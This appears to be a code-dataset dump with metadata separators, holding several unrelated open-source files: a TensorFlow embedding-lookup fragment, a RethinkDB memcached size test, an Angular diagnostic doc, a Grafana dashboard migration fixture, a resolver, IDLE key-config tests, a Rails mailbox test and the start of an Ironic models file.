      params = ops.convert_n_to_tensor_or_indexed_slices(params, name="params")
    if np == 1:
      # Single shard: gather, weight (or dedup-sum) colocated with the shard.
      with ops.colocate_with(params[0]):
        ret = maybe_normalize(_do_gather(params[0], ids))
        ignore_weights = weights is None
        if not ignore_weights:
          if weights.dtype != ret.dtype:
            weights = math_ops.cast(weights, ret.dtype)
          # Reshape to allow broadcast
          ones = array_ops.fill(
              array_ops.expand_dims(array_ops.rank(ret) - 1, 0), 1)
          bcast_weights_shape = array_ops.concat(
              [array_ops.shape(weights), ones], 0)
          orig_weights_shape = weights.get_shape()
          weights = array_ops.reshape(weights, bcast_weights_shape)
          # Set weights shape after reshape
          if ret.get_shape().ndims is not None:
            weights.set_shape(
                orig_weights_shape.concatenate(
                    [1 for _ in range(ret.get_shape().ndims - 1)]))
          ret *= weights
          return math_ops.segment_sum(ret, segment_ids, name=name)
        else:
          return math_ops.sparse_segment_sum(ret, idx, segment_ids, name=name)
    else:
      ids = ops.convert_to_tensor(ids, name="ids")
      flat_ids = array_ops.reshape(ids, [-1])
      original_indices = math_ops.range(array_ops.size(flat_ids))
      # Create p_assignments and set new_ids depending on the strategy.
      if partition_strategy == "mod":
        p_assignments = flat_ids % np
        new_ids = flat_ids // np
      elif partition_strategy == "div":
        # Compute num_total_ids as the sum of dim-0 of params, then assign to
        # partitions based on a constant number of ids per partition. Optimize
        # if we already know the full shape statically.
        dim_0_size = params[0].get_shape()[0]
        for p in xrange(1, np):
          dim_0_size += params[p].get_shape()[0]
        if dim_0_size.value:
          num_total_ids = constant_op.constant(dim_0_size.value, flat_ids.dtype)
        else:
          # Fall back to dynamic shapes for any shard whose size is unknown.
          dim_0_sizes = []
          for p in xrange(np):
            if params[p].get_shape()[0].value is not None:
              dim_0_sizes.append(params[p].get_shape()[0].value)
            else:
              with ops.colocate_with(params[p]):
                dim_0_sizes.append(array_ops.shape(params[p])[0])
          num_total_ids = math_ops.reduce_sum(
              math_ops.cast(array_ops.stack(dim_0_sizes), flat_ids.dtype))
        ids_per_partition = num_total_ids // np
        extras = num_total_ids % np
        # The first `extras` partitions hold one extra id each.
        p_assignments = math_ops.maximum(flat_ids // (ids_per_partition + 1), (
            flat_ids - extras) // ids_per_partition)
        # Emulate a conditional using a boolean indicator tensor
        is_in_first_extras_partitions = math_ops.cast(p_assignments < extras,
                                                      flat_ids.dtype)
        new_ids = (is_in_first_extras_partitions * (flat_ids %
                                                    (ids_per_partition + 1)) +
                   (1 - is_in_first_extras_partitions) * (
                       (flat_ids - extras) % ids_per_partition))
      else:
        raise ValueError("Unrecognized partition strategy: " +
                         partition_strategy)
      # Cast partition assignments to int32 for use in dynamic_partition.
      # There really should not be more than 2^32 partitions.
      p_assignments = math_ops.cast(p_assignments, dtypes.int32)
      # Partition list of ids based on assignments into np separate lists
      gather_ids = data_flow_ops.dynamic_partition(new_ids, p_assignments, np)
      # Similarly, partition the original indices.
      pindices = data_flow_ops.dynamic_partition(original_indices,
                                                 p_assignments, np)
      # Do np separate lookups, finding embeddings for plist[p] in params[p]
      partitioned_result = []
      for p in xrange(np):
        with ops.colocate_with(params[p]):
          partitioned_result.append(_do_gather(params[p], gather_ids[p]))
      ignore_weights = weights is None
      if not ignore_weights:
        # Partition weights according to pindices.
        partitioned_weight = []
        for p in xrange(np):
          partitioned_weight.append(array_ops.gather(weights, pindices[p]))
      # Reshape each partition result.
      element_shape = params[0].get_shape()[1:]
      for p in params[1:]:
        element_shape = element_shape.merge_with(p.get_shape()[1:])
      if element_shape.is_fully_defined():
        for p in xrange(np):
          with ops.colocate_with(params[p]):
            partitioned_result[p] = array_ops.reshape(
                partitioned_result[p],
                array_ops.concat([array_ops.shape(pindices[p]), element_shape],
                                 0))
      else:
        # Element shape unknown statically; read it from the first shard.
        with ops.colocate_with(params[0]):
          params_shape = array_ops.shape(params[0])
        for p in xrange(np):
          with ops.colocate_with(params[p]):
            partitioned_result[p] = array_ops.reshape(
                partitioned_result[p],
                array_ops.concat([
                    array_ops.shape(pindices[p]), array_ops.slice(
                        params_shape, [1], [-1])
                ], 0))
      # Normalize each partition result.
      for p in xrange(np):
        with ops.colocate_with(params[p]):
          partitioned_result[p] = maybe_normalize(partitioned_result[p])
      if not ignore_weights:
        # Multiply each partition result with partition weights.
        for p in xrange(np):
          with ops.colocate_with(params[p]):
            if partitioned_weight[p].dtype != partitioned_result[p].dtype:
              partitioned_weight[p] = math_ops.cast(partitioned_weight[p],
                                                    partitioned_result[p].dtype)
            # Reshape partition weights.
            ones = array_ops.fill(
                array_ops.expand_dims(
                    array_ops.rank(partitioned_result[p]) - 1, 0), 1)
            bcast_weights_shape = array_ops.concat(
                [array_ops.shape(partitioned_weight[p]), ones], 0)
            orig_weights_shape = partitioned_weight[p].get_shape()
            partitioned_weight[p] = array_ops.reshape(partitioned_weight[p],
                                                      bcast_weights_shape)
            if partitioned_result[p].get_shape().ndims is not None:
              partitioned_weight[p].set_shape(
                  orig_weights_shape.concatenate([
                      1
                      for _ in range(partitioned_result[p].get_shape().ndims -
                                     1)
                  ]))
            partitioned_result[p] *= partitioned_weight[p]
      partitioned_segment_ids = []
      for p in xrange(np):
        if not ignore_weights:
          # Partition segment_ids according to pindices.
          p_segment_ids = array_ops.gather(segment_ids, pindices[p])
          # Number the p_segment_ids to meet segment_sum's requirements. Note
          # that unique_p_segment_ids contains unique segment ids of this
          # partition and these ids' order is unchanged.
          unique_p_segment_ids, unique_p_segment_idx = array_ops.unique(
              p_segment_ids)
          partitioned_segment_ids.append(unique_p_segment_ids)
          # segment_sum this partition's result.
          with ops.colocate_with(params[p]):
            partitioned_result[p] = math_ops.segment_sum(
                partitioned_result[p], unique_p_segment_idx)
        else:
          # When ignoring weights, recover which elements of idx and
          # segment_ids belong to this partition.
          _, exclude_idx = array_ops.setdiff1d(idx, pindices[p])
          all_idx = math_ops.range(array_ops.shape(idx)[0])
          _, include_idx = array_ops.setdiff1d(all_idx, exclude_idx)
          # Gather segment_ids and idx according to those indices.
          p_segment_ids = array_ops.gather(segment_ids, include_idx)
          p_idx = array_ops.gather(idx, include_idx)
          # Renumber the p_segment_ids, as in the weighted branch above.
          unique_p_segment_ids, unique_p_segment_idx = array_ops.unique(
              p_segment_ids)
          _, unique_p_idx_idx = array_ops.unique(p_idx)
          partitioned_segment_ids.append(unique_p_segment_ids)
          with ops.colocate_with(params[p]):
            partitioned_result[p] = math_ops.sparse_segment_sum(
                partitioned_result[p], unique_p_idx_idx, unique_p_segment_idx)
      # Concat each partition's segment_ids and result for final segment_sum.
      concat_segment_ids = array_ops.concat(partitioned_segment_ids, 0)
      concat_partitioned_result = array_ops.concat(partitioned_result, 0)
      return math_ops.unsorted_segment_sum(
          concat_partitioned_result,
          concat_segment_ids,
          math_ops.reduce_max(concat_segment_ids) + 1,
          name=name)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# Copyright 2010-2012 RethinkDB, all rights reserved.
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'common')))
import memcached_workload_common
def readline(s):
    """Read from socket `s` one byte at a time until the buffer ends in CRLF."""
    line = ""
    while True:
        line += s.recv(1)
        if line.endswith("\r\n"):
            return line
def abbreviate(s):
    """Return repr(s), shortened to the first and last 25 chars when s is long."""
    if len(s) >= 50:
        return "%s...%s" % (repr(s[:25]), repr(s[-25:]))
    return repr(s)
def expect(s, string):
    """Read exactly len(string) bytes from `s` and raise unless they match."""
    received = ""
    remaining = len(string)
    while remaining > 0:
        received += s.recv(remaining)
        remaining = len(string) - len(received)
    if received != string:
        raise ValueError("Didn't get what we expected: expected %s, got %s" % (abbreviate(string), abbreviate(received)))
def expect_get_response(s, value):
    # Verify a full memcached GET response for key "x": the VALUE header with
    # the payload length, the payload itself, then the END terminator.
    # (Python 2 prints with trailing commas keep progress on one line.)
    expect(s, "VALUE x 0 %d\r\n" % len(value))
    print " value decl...",
    expect(s, value + "\r\n")
    print " content...",
    expect(s, "END\r\n")
    print " ok."
def test_sizes_one_way(ap, x, y, s):
    # Store an x-byte value under key "x", then use `ap` ("append" or
    # "prepend") to grow it by (y - x) bytes, checking the server response at
    # each step. Values over 1 MiB are expected to be rejected.
    print "Sending a %d-byte value..." % x,
    s.send(("set x 0 0 %d\r\n" % x) + ("a" * x) + "\r\n")
    max_legal_value_size = 1024 * 1024
    if x <= max_legal_value_size:
        expect(s, "STORED\r\n")
        print " getting...",
        s.send("get x\r\n")
        print " sent get...",
        expect_get_response(s, "a" * x)
        print "Now %sing upto length %d..." % (ap, y),
        s.send(("%s x 0 0 %d\r\n" % (ap, y - x)) + ("b" * (y - x)) + "\r\n")
        if y <= max_legal_value_size:
            expect(s, "STORED\r\n")
            print " getting...",
            s.send("get x\r\n")
            print " sent get...",
            # append puts the new "b" bytes after the original value;
            # prepend puts them before it.
            expect_get_response(s, ("a" * x + "b" * (y - x) if ap == "append" else "b" * (y - x) + "a" * x))
        else:
            # Grown value exceeds the limit: server must refuse it.
            expect(s, "SERVER_ERROR object too large for cache\r\n")
            print " too big... ok."
    else:
        # Initial value already exceeds the limit: server must refuse it.
        expect(s, "SERVER_ERROR object too large for cache\r\n")
        print " too big... ok."
def test_sizes_another_way(ap, x, y, s):
    # Thin alias for test_sizes_one_way, kept so the append and prepend runs
    # in test_sizes read symmetrically.
    test_sizes_one_way(ap, x, y, s)
def test_sizes(x, y, s):
    # Grow an x-byte value to y bytes once via append and once via prepend.
    test_sizes_one_way("append", x, y, s)
    test_sizes_another_way("prepend", x, y, s)
# Script entry point: connect to the server under test and exercise every
# increasing (x, y) size pair with both append and prepend.
op = memcached_workload_common.option_parser_for_socket()
opts = op.parse(sys.argv)
with memcached_workload_common.make_socket_connection(opts) as s:
    # Interesting sizes around internal storage boundaries:
    # 250 - the maximum small value
    # 251 - the minimum large buf (in a leaf node)
    # 4080 - the size of a large buf block (the largest large buf that uses a single block)
    # 8160 - twice the size of a large buf block
    # 65536 - 16-bit rollover
    # 73710 - netrecord causes some kind of weird failure at this point sometimes
    # (234 / 4) * 4080 - the biggest large value that uses one level
    # 10 * 1048576 - the maximum legal value size
    # NOTE(review): the list below uses (232 / 4) * 4080 and 10 * 1048577,
    # which differ from the (234 / 4) and 10 * 1048576 described above —
    # confirm which values are intended.
    sizes = [250, 4079, 4080, 4081, 8160, 8161, (232 / 4) * 4080 - 1, (232 / 4) * 4080, (232 / 4) * 4080 + 1, 1048576, 10 * 1048577]
    for x in sizes:
        for y in sizes:
            if x < y:
                test_sizes(x, y, s)
    s.send("quit\r\n")
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Suffix not supported
This diagnostic detects when the `.px`, `.%`, and `.em` suffixes are used with an attribute
binding.
```html
<img [attr.width.px]="5" />
```
## What's wrong with that?
These suffixes are only available for style bindings. They do not have any meaning when binding to an attribute.
## What should I do instead?
Rather than using the `.px`, `.%`, or `.em` suffixes, which are only supported in style bindings,
include the unit directly in the value assigned to the attribute binding.
```html
<img [attr.width]="'5px'" />
```
## Configuration requirements
[`strictTemplates`](tools/cli/template-typecheck#strict-mode) must be enabled for any extended diagnostic to emit.
`suffixNotSupported` has no additional requirements beyond `strictTemplates`.
## What if I can't avoid this?
This diagnostic can be disabled by editing the project's `tsconfig.json` file:
```json
{
"angularCompilerOptions": {
"extendedDiagnostics": {
"checks": {
"suffixNotSupported": "suppress"
}
}
}
}
```
See [extended diagnostic configuration](extended-diagnostics#configuration) for more info.
|
unknown
|
github
|
https://github.com/angular/angular
|
adev/src/content/reference/extended-diagnostics/NG8106.md
|
{
"annotations": {
"list": [
{
"builtIn": 1,
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"type": "dashboard"
}
]
},
"editable": true,
"fiscalYearStartMonth": 0,
"graphTooltip": 0,
"links": [],
"panels": [
{
"description": "Tests v33 migration behavior when panel datasource is explicitly null. Should remain null after migration (returnDefaultAsNull: true).",
"id": 1,
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Target with UID reference should migrate to full object",
"refId": "A"
}
],
"title": "Panel Datasource: null → should stay null",
"type": "stat"
},
{
"datasource": {
"type": "prometheus",
"uid": "existing-ref-uid"
},
"description": "Tests v33 migration behavior when panel datasource is already a proper object reference. Should remain unchanged.",
"id": 2,
"targets": [
{
"datasource": {
"type": "elasticsearch",
"uid": "existing-target-uid"
},
"description": "Target with existing object should remain unchanged",
"refId": "A"
}
],
"title": "Panel Datasource: existing object → should stay unchanged",
"type": "stat"
},
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Tests v33 migration when panel datasource is a string name. Should convert to proper object with uid, type, apiVersion.",
"id": 3,
"title": "Panel Datasource: string name → should migrate to object",
"type": "table"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Tests v33 migration when panel has datasource string but empty targets array. Panel datasource should still migrate.",
"id": 4,
"title": "Panel Datasource: string name with empty targets → should migrate",
"type": "table"
},
{
"autoMigrateFrom": "graph",
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Tests v33 target migration with various edge cases: null target (unchanged), valid string (migrated), non-existing string (preserved), missing datasource field (unchanged).",
"id": 5,
"targets": [
{
"description": "Null target datasource should remain null",
"refId": "A"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Valid string should migrate to object",
"refId": "B"
},
{
"datasource": {
"uid": "non-existing-ds"
},
"description": "Non-existing datasource should be preserved as-is (migration returns nil)",
"refId": "C"
},
{
"description": "Target without datasource field should remain unchanged",
"refId": "D"
}
],
"title": "Target Datasources: mixed null/string/non-existing scenarios",
"type": "timeseries"
},
{
"description": "Tests v33 migration when panel datasource is null but targets have mixed reference types (object, string). Panel should stay null, targets should migrate appropriately.",
"id": 6,
"targets": [
{
"datasource": {
"type": "prometheus",
"uid": "existing-ref"
},
"description": "Existing object target should remain unchanged",
"refId": "A"
},
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "String target should migrate to object",
"refId": "B"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Default datasource string should migrate to object",
"refId": "C"
}
],
"title": "Panel: null datasource with mixed target types",
"type": "timeseries"
},
{
"datasource": {},
"description": "Tests v33 migration behavior with empty string datasource. Should migrate to empty object {} based on MigrateDatasourceNameToRef logic.",
"id": 7,
"targets": [
{
"datasource": {},
"description": "Empty string target should also migrate to empty object {}",
"refId": "A"
}
],
"title": "Empty string datasource → should return empty object {}",
"type": "stat"
},
{
"datasource": {
"uid": "completely-missing-ds"
},
"description": "Tests v33 migration with completely unknown datasource names. Since migration returns nil for unknown datasources, they should be preserved unchanged.",
"id": 8,
"targets": [
{
"datasource": {
"uid": "also-missing-ds"
},
"description": "Unknown target datasource should remain unchanged (migration returns nil)",
"refId": "A"
},
{
"datasource": {},
"description": "Empty string target should migrate to {}",
"refId": "B"
}
],
"title": "Non-existing datasources → should be preserved as-is",
"type": "table"
},
{
"collapsed": true,
"description": "Tests v33 migration handles nested panels within collapsed rows. Nested panel datasources should migrate same as top-level panels.",
"id": 9,
"panels": [
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Nested panel with string datasource should migrate to proper object reference, proving row panel recursion works.",
"id": 10,
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Nested target should also migrate from string to object",
"refId": "A"
}
],
"title": "Nested Panel: string datasource → should migrate to object",
"type": "timeseries"
}
],
"title": "Row Panel: nested panels should also migrate",
"type": "row"
}
],
"schemaVersion": 33,
"tags": [],
"templating": {
"list": []
},
"time": {
"from": "now-6h",
"to": "now"
},
"timepicker": {},
"timezone": "",
"title": "V33 Panel Datasource Name to Ref Test",
"weekStart": ""
}
|
json
|
github
|
https://github.com/grafana/grafana
|
apps/dashboard/pkg/migration/testdata/output/single_version/v33.panel_ds_name_to_ref.v33.json
|
# -*- coding: utf-8 -*-
#
# This file is part of RERO ILS.
# Copyright (C) 2017 RERO.
#
# RERO ILS is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# RERO ILS is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RERO ILS; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, RERO does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Organisation resolver."""
import jsonresolver
from invenio_pidstore.models import PersistentIdentifier, PIDStatus
@jsonresolver.route('/api/libraries/<pid>', host='ils.rero.ch')
def library_resolver(pid):
    """Resolve a library JSON reference by its persistent identifier.

    Looks up the ``lib`` PID and, when it is in the REGISTERED state,
    returns a minimal dict carrying the pid value.

    :param pid: persistent identifier value of the library record.
    :returns: dict with the resolved ``pid`` value.
    :raises Exception: if the PID is not in the REGISTERED state.
    """
    persistent_id = PersistentIdentifier.get('lib', pid)
    if persistent_id.status == PIDStatus.REGISTERED:
        return dict(pid=persistent_id.pid_value)
    # NOTE(review): PersistentIdentifier.get presumably raises on unknown
    # pids, so this branch covers non-REGISTERED states -- confirm.
    raise Exception('unable to resolve')
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Test config_key, coverage 98%.
Coverage is effectively 100%. Tkinter dialog is mocked, Mac-only line
may be skipped, and dummy function in bind test should not be called.
Not tested: exit with 'self.advanced or self.keys_ok(keys) ...' False.
"""
from idlelib import config_key
from test.support import requires
import unittest
from unittest import mock
from tkinter import Tk, TclError
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Mbox_func
class ValidationTest(unittest.TestCase):
    "Test validation methods: ok, keys_ok, bind_ok."

    class Validator(config_key.GetKeysFrame):
        # GetKeysFrame with the pieces the validators touch replaced by
        # mocks: the final-key listbox, get_modifiers, and showerror.
        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            class list_keys_final:
                # Stands in for the tk Listbox; only .get() is used here.
                get = Func()
            self.list_keys_final = list_keys_final
        get_modifiers = Func()
        showerror = Mbox_func()  # Records the message instead of popping up.

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        # keylist seeds the duplicate detection exercised by test_keys_dup.
        keylist = [['<Key-F12>'], ['<Control-Key-x>', '<Control-Key-X>']]
        cls.dialog = cls.Validator(cls.root, '<<Test>>', keylist)

    @classmethod
    def tearDownClass(cls):
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    def setUp(self):
        # Reset the captured error message before each test.
        self.dialog.showerror.message = ''
    # A test that needs a particular final key value should set it.
    # A test that sets a non-blank modifier list should reset it to [].

    def test_ok_empty(self):
        # Whitespace-only key string: error message, empty result.
        self.dialog.key_string.set(' ')
        self.dialog.ok()
        self.assertEqual(self.dialog.result, '')
        self.assertEqual(self.dialog.showerror.message, 'No key specified.')

    def test_ok_good(self):
        self.dialog.key_string.set('<Key-F11>')
        self.dialog.list_keys_final.get.result = 'F11'
        self.dialog.ok()
        self.assertEqual(self.dialog.result, '<Key-F11>')
        self.assertEqual(self.dialog.showerror.message, '')

    def test_keys_no_ending(self):
        # Sequence missing the closing final key.
        self.assertFalse(self.dialog.keys_ok('<Control-Shift'))
        self.assertIn('Missing the final', self.dialog.showerror.message)

    def test_keys_no_modifier_bad(self):
        # A plain letter requires at least one modifier.
        self.dialog.list_keys_final.get.result = 'A'
        self.assertFalse(self.dialog.keys_ok('<Key-A>'))
        self.assertIn('No modifier', self.dialog.showerror.message)

    def test_keys_no_modifier_ok(self):
        # Function keys are accepted without modifiers.
        self.dialog.list_keys_final.get.result = 'F11'
        self.assertTrue(self.dialog.keys_ok('<Key-F11>'))
        self.assertEqual(self.dialog.showerror.message, '')

    def test_keys_shift_bad(self):
        # Shift alone with a single lowercase letter is rejected.
        self.dialog.list_keys_final.get.result = 'a'
        self.dialog.get_modifiers.result = ['Shift']
        self.assertFalse(self.dialog.keys_ok('<a>'))
        self.assertIn('shift modifier', self.dialog.showerror.message)
        self.dialog.get_modifiers.result = []

    def test_keys_dup(self):
        # Each sequence collides with one seeded via keylist in setUpClass.
        for mods, final, seq in (([], 'F12', '<Key-F12>'),
                                 (['Control'], 'x', '<Control-Key-x>'),
                                 (['Control'], 'X', '<Control-Key-X>')):
            with self.subTest(m=mods, f=final, s=seq):
                self.dialog.list_keys_final.get.result = final
                self.dialog.get_modifiers.result = mods
                self.assertFalse(self.dialog.keys_ok(seq))
                self.assertIn('already in use', self.dialog.showerror.message)
        self.dialog.get_modifiers.result = []

    def test_bind_ok(self):
        self.assertTrue(self.dialog.bind_ok('<Control-Shift-Key-a>'))
        self.assertEqual(self.dialog.showerror.message, '')

    def test_bind_not_ok(self):
        # A sequence tkinter's bind() itself rejects.
        self.assertFalse(self.dialog.bind_ok('<Control-Shift>'))
        self.assertIn('not accepted', self.dialog.showerror.message)
class ToggleLevelTest(unittest.TestCase):
    "Test toggle between Basic and Advanced frames."

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        cls.dialog = config_key.GetKeysFrame(cls.root, '<<Test>>', [])

    @classmethod
    def tearDownClass(cls):
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    def test_toggle_level(self):
        dialog = self.dialog

        def stackorder():
            """Get the stack order of the children of the frame.

            winfo_children() stores the children in stack order, so
            this can be used to check whether a frame is above or
            below another one.
            """
            for index, child in enumerate(dialog.winfo_children()):
                if child._name == 'keyseq_basic':
                    basic = index
                if child._name == 'keyseq_advanced':
                    advanced = index
            return basic, advanced

        # New window starts at basic level.
        self.assertFalse(dialog.advanced)
        self.assertIn('Advanced', dialog.button_level['text'])
        basic, advanced = stackorder()
        self.assertGreater(basic, advanced)

        # Toggle to advanced.
        dialog.toggle_level()
        self.assertTrue(dialog.advanced)
        self.assertIn('Basic', dialog.button_level['text'])
        basic, advanced = stackorder()
        self.assertGreater(advanced, basic)

        # Toggle back to basic; invoking the button exercises the handler.
        dialog.button_level.invoke()
        self.assertFalse(dialog.advanced)
        self.assertIn('Advanced', dialog.button_level['text'])
        basic, advanced = stackorder()
        self.assertGreater(basic, advanced)
class KeySelectionTest(unittest.TestCase):
    "Test selecting key on Basic frames."

    class Basic(config_key.GetKeysFrame):
        # GetKeysFrame with a mocked final-key listbox and a fixed,
        # platform-independent modifier set.
        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            class list_keys_final:
                get = Func()
                select_clear = Func()
                yview = Func()
            self.list_keys_final = list_keys_final
        def set_modifiers_for_platform(self):
            # Avoid Mac-vs-other differences; 'BAZ' is displayed as 'ZZZ'.
            self.modifiers = ['foo', 'bar', 'BAZ']
            self.modifier_label = {'BAZ': 'ZZZ'}
        showerror = Mbox_func()

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        cls.dialog = cls.Basic(cls.root, '<<Test>>', [])

    @classmethod
    def tearDownClass(cls):
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    def setUp(self):
        # Start each test with no modifiers or final key selected.
        self.dialog.clear_key_seq()

    def test_get_modifiers(self):
        dialog = self.dialog
        gm = dialog.get_modifiers
        eq = self.assertEqual
        # Modifiers are set on/off by invoking the checkbutton.
        dialog.modifier_checkbuttons['foo'].invoke()
        eq(gm(), ['foo'])
        dialog.modifier_checkbuttons['BAZ'].invoke()
        eq(gm(), ['foo', 'BAZ'])
        dialog.modifier_checkbuttons['foo'].invoke()
        eq(gm(), ['BAZ'])

    @mock.patch.object(config_key.GetKeysFrame, 'get_modifiers')
    def test_build_key_string(self, mock_modifiers):
        dialog = self.dialog
        key = dialog.list_keys_final
        string = dialog.key_string.get
        eq = self.assertEqual
        # Plain key, no modifiers.
        key.get.result = 'a'
        mock_modifiers.return_value = []
        dialog.build_key_string()
        eq(string(), '<Key-a>')
        # One modifier is prefixed to the key.
        mock_modifiers.return_value = ['mymod']
        dialog.build_key_string()
        eq(string(), '<mymod-Key-a>')
        # Modifiers only, no final key selected.
        key.get.result = ''
        mock_modifiers.return_value = ['mymod', 'test']
        dialog.build_key_string()
        eq(string(), '<mymod-test>')

    @mock.patch.object(config_key.GetKeysFrame, 'get_modifiers')
    def test_final_key_selected(self, mock_modifiers):
        dialog = self.dialog
        key = dialog.list_keys_final
        string = dialog.key_string.get
        eq = self.assertEqual
        # '{' must be translated to its keysym name 'braceleft'.
        mock_modifiers.return_value = ['Shift']
        key.get.result = '{'
        dialog.final_key_selected()
        eq(string(), '<Shift-Key-braceleft>')
class CancelWindowTest(unittest.TestCase):
    "Simulate user clicking [Cancel] button."

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        # _utest=True keeps the window from grabbing focus / blocking.
        cls.dialog = config_key.GetKeysWindow(
            cls.root, 'Title', '<<Test>>', [], _utest=True)

    @classmethod
    def tearDownClass(cls):
        cls.dialog.cancel()
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    @mock.patch.object(config_key.GetKeysFrame, 'ok')
    def test_cancel(self, mock_frame_ok):
        self.assertEqual(self.dialog.winfo_class(), 'Toplevel')
        self.dialog.button_cancel.invoke()
        # The window is destroyed, so any winfo call now raises.
        with self.assertRaises(TclError):
            self.dialog.winfo_class()
        self.assertEqual(self.dialog.result, '')
        # Cancel must not run the frame's ok() validation.
        mock_frame_ok.assert_not_called()


class OKWindowTest(unittest.TestCase):
    "Simulate user clicking [OK] button."

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        cls.dialog = config_key.GetKeysWindow(
            cls.root, 'Title', '<<Test>>', [], _utest=True)

    @classmethod
    def tearDownClass(cls):
        cls.dialog.cancel()
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    @mock.patch.object(config_key.GetKeysFrame, 'ok')
    def test_ok(self, mock_frame_ok):
        self.assertEqual(self.dialog.winfo_class(), 'Toplevel')
        self.dialog.button_ok.invoke()
        # OK destroys the window and delegates validation to the frame.
        with self.assertRaises(TclError):
            self.dialog.winfo_class()
        mock_frame_ok.assert_called()


class WindowResultTest(unittest.TestCase):
    "Test window result get and set."

    @classmethod
    def setUpClass(cls):
        requires('gui')
        cls.root = Tk()
        cls.root.withdraw()
        cls.dialog = config_key.GetKeysWindow(
            cls.root, 'Title', '<<Test>>', [], _utest=True)

    @classmethod
    def tearDownClass(cls):
        cls.dialog.cancel()
        del cls.dialog
        cls.root.update_idletasks()
        cls.root.destroy()
        del cls.root

    def test_result(self):
        # The window's result property proxies the frame's attribute
        # in both directions.
        dialog = self.dialog
        eq = self.assertEqual
        dialog.result = ''
        eq(dialog.result, '')
        eq(dialog.frame.result,'')
        dialog.result = 'bar'
        eq(dialog.result,'bar')
        eq(dialog.frame.result,'bar')
        dialog.frame.result = 'foo'
        eq(dialog.result, 'foo')
        eq(dialog.frame.result,'foo')
class HelperTest(unittest.TestCase):
    """Tests for module-level helper functions of config_key."""

    def test_translate_key(self):
        """translate_key: keysym conversion and Shift uppercasing."""
        translate = config_key.translate_key
        cases = (
            # Letters return unchanged with no 'Shift'.
            ('q', [], 'Key-q'),
            ('q', ['Control', 'Alt'], 'Key-q'),
            # 'Shift' uppercases single lowercase letters.
            ('q', ['Shift'], 'Key-Q'),
            ('q', ['Control', 'Shift'], 'Key-Q'),
            ('q', ['Control', 'Alt', 'Shift'], 'Key-Q'),
            # Key name is converted to its keysym.
            ('Page Up', [], 'Key-Prior'),
            # 'Shift' does not change case for multi-char names.
            ('*', ['Shift'], 'Key-asterisk'),
        )
        for key, modifiers, expected in cases:
            with self.subTest(key=key, modifiers=modifiers):
                self.assertEqual(translate(key, modifiers), expected)
# Run the suite with per-test output when executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
|
python
|
github
|
https://github.com/python/cpython
|
Lib/idlelib/idle_test/test_config_key.py
|
# frozen_string_literal: true
require "test_helper"
class ActionMailbox::IncinerationJobTest < ActiveJob::TestCase
  setup { @inbound_email = create_inbound_email_from_fixture("welcome.eml") }

  # Incinerating an inbound email that was deleted before the job ran
  # must be a silent no-op rather than an error.
  test "ignoring a missing inbound email" do
    @inbound_email.destroy!

    perform_enqueued_jobs do
      assert_nothing_raised do
        ActionMailbox::IncinerationJob.perform_later @inbound_email
      end
    end
  end
end
|
ruby
|
github
|
https://github.com/rails/rails
|
actionmailbox/test/jobs/incineration_job_test.rb
|
# -*- encoding: utf-8 -*-
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for baremetal data.
"""
import json
